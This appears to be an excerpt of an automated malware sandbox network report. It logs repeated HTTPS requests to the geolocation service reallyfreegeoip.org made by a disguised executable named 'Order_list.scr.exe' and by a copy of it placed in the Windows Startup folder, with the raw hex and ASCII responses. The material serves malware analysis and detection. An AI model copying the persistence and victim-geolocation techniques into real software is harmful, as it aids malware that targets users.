                                                                                                                          2025-01-13 09:12:06 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449734104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:06 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:07 UTC853INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:07 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074316
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WK4N63BTtF5htprUTyMbD1c%2BXVHO5vSNQuwd2kA8yVs%2F05MrWZb3BBge7g4bQl58aucvQvFVx52J2blGqpBaAw5iOlsOyCTtkBScwcCzy4zR37D2GqvWCBJxHMTk4Buew4W9XHd"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443442be94414-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1661&rtt_var=642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1680092&cwnd=180&unsent_bytes=0&cid=13b3d0052007952a&ts=157&x=0"
                                                                                                                          2025-01-13 09:12:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449737104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:08 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:08 UTC851INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:08 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074317
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PnpI8i8LPT0PN9Bx49Kd1sthtekA6vkDvRXO7FhN2eEaoaymiu07Y4p3cbln0ZKwBz00RNTMicxBSGpGh5OP56tPqjP1UVSCcc5PmkQDEbmur61hzp4rvVv9%2Ba8MLXXqwXEZKjZb"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9014434d0df4de95-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1552&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1819314&cwnd=243&unsent_bytes=0&cid=84a181e7ef8d1817&ts=146&x=0"
                                                                                                                          2025-01-13 09:12:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449739104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:09 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:09 UTC865INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:09 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074318
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ftnbq7TWDf0%2FW%2FksXs9c%2F6O8oTxMVW7p2XkHH%2BcEktbwT9zdb1M8ZAKJ4%2FIBttxLjs45Ymr8pw%2FEhOZSRJVA1CM%2BNr3IIkctSscU0qeFUR%2Bse9bxzh20VmvBkbci4499D3JPunXf"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443554dfd4414-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1690&rtt_var=640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1700640&cwnd=180&unsent_bytes=0&cid=a21e3d1dc43a375f&ts=134&x=0"
                                                                                                                          2025-01-13 09:12:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449743104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:11 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:11 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:11 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074320
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnKbRGYqXz0GCU9dUCdhtftklQi7IrHabG2%2F8z31C%2FSFwkF7pCHze3a52GHZKkLhlvtbnnrwozpO4fw%2BXnZPUfdCBUdq%2FL5xa%2F9eVDhr3DeoL1wXjrrSXgl6BU5cmgdd3I4mHsvM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9014435dafa17c6a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1974&rtt_var=749&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1452736&cwnd=218&unsent_bytes=0&cid=0df1691fab90dc54&ts=149&x=0"
                                                                                                                          2025-01-13 09:12:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.449745104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:12 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:12 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074321
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2FoOy3EQfAL6taXAwlr5H85EuOttIKxvbLuPr9Obhmq2NRXfHoD6c0YOX0qocnbS8L1Doox7hGPZlS%2FTMIf9iKFMyoGIEG9OBch0jFJLB5Oxq8lYZMdFt1ARPx%2FK3%2BtykzX8oQBY"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90144365cb638ca1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1934&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1463659&cwnd=168&unsent_bytes=0&cid=f015433920ab4bee&ts=139&x=0"
                                                                                                                          2025-01-13 09:12:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.449747104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:13 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:13 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:13 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074322
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RfF9UZ%2BldHHAkzG1ZxD6vA6GOF441Znoskpw2YA8kI3PHVcq3av35MzhMQp4hE63NOY5oliBs%2B1K6MHEdvLvCpIOWBtLY0GbaVCYAMVWZMOFOy9w2Cuk4FCmnTdp4x%2FhUai8tkGL"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9014436df80d7c6a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1958&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1461461&cwnd=218&unsent_bytes=0&cid=d9aedc3c8ea1a8cc&ts=139&x=0"
                                                                                                                          2025-01-13 09:12:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449749104.21.64.14433584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:15 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:15 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074324
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=33sKB6%2FsZFCmPdI66NyfIzjfpUeyXXuEnjmDpRfIJEjvnG19qLmP6cIiRdl9RM4QEwBa7uFN1bXltMtPRD7p5DfEX%2Fsk9WPS2%2FJbGd3kj9BlhPHdleyt3Z9xdRCGssM%2BedtExHoC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443762d76c358-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1597&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=155&unsent_bytes=0&cid=e63e3c6470e868bf&ts=133&x=0"
                                                                                                                          2025-01-13 09:12:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.449751104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:19 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-13 09:12:19 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:19 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074329
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2dkNaJ5gcIo5IrPGqgMIlfcpDO4qbz%2BUG%2FEa5TqwXc3p%2BTSv0A52fykZUWm3y1120TWcn7P3JMtAmtrnn%2BNbId7chRbe03CMln2lr2s9z4rluGvN84%2BYOUQq3UozLBI6oRHIFJk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901443948bca7c6a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1923&rtt_var=733&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1482233&cwnd=218&unsent_bytes=0&cid=f8abdf9d9ac70aea&ts=230&x=0"
                                                                                                                          2025-01-13 09:12:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449754104.21.64.14436256C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 09:12:20 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-13 09:12:20 UTC861INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:20 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 2074329
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nfzi2aL7etkZNyjFWrh05HITDIRrYZwI7RALDuXgV2qBmxJiHFRacW3YbcF9ML%2BUSN1w%2BW3oxtSzlPgnJv7RybmTUsMhM61k2%2FgsIwkp%2BmLy%2BM8j2SeGfR%2Fupjke96KUbPXEFDBZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9014439a4f5a8ca1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
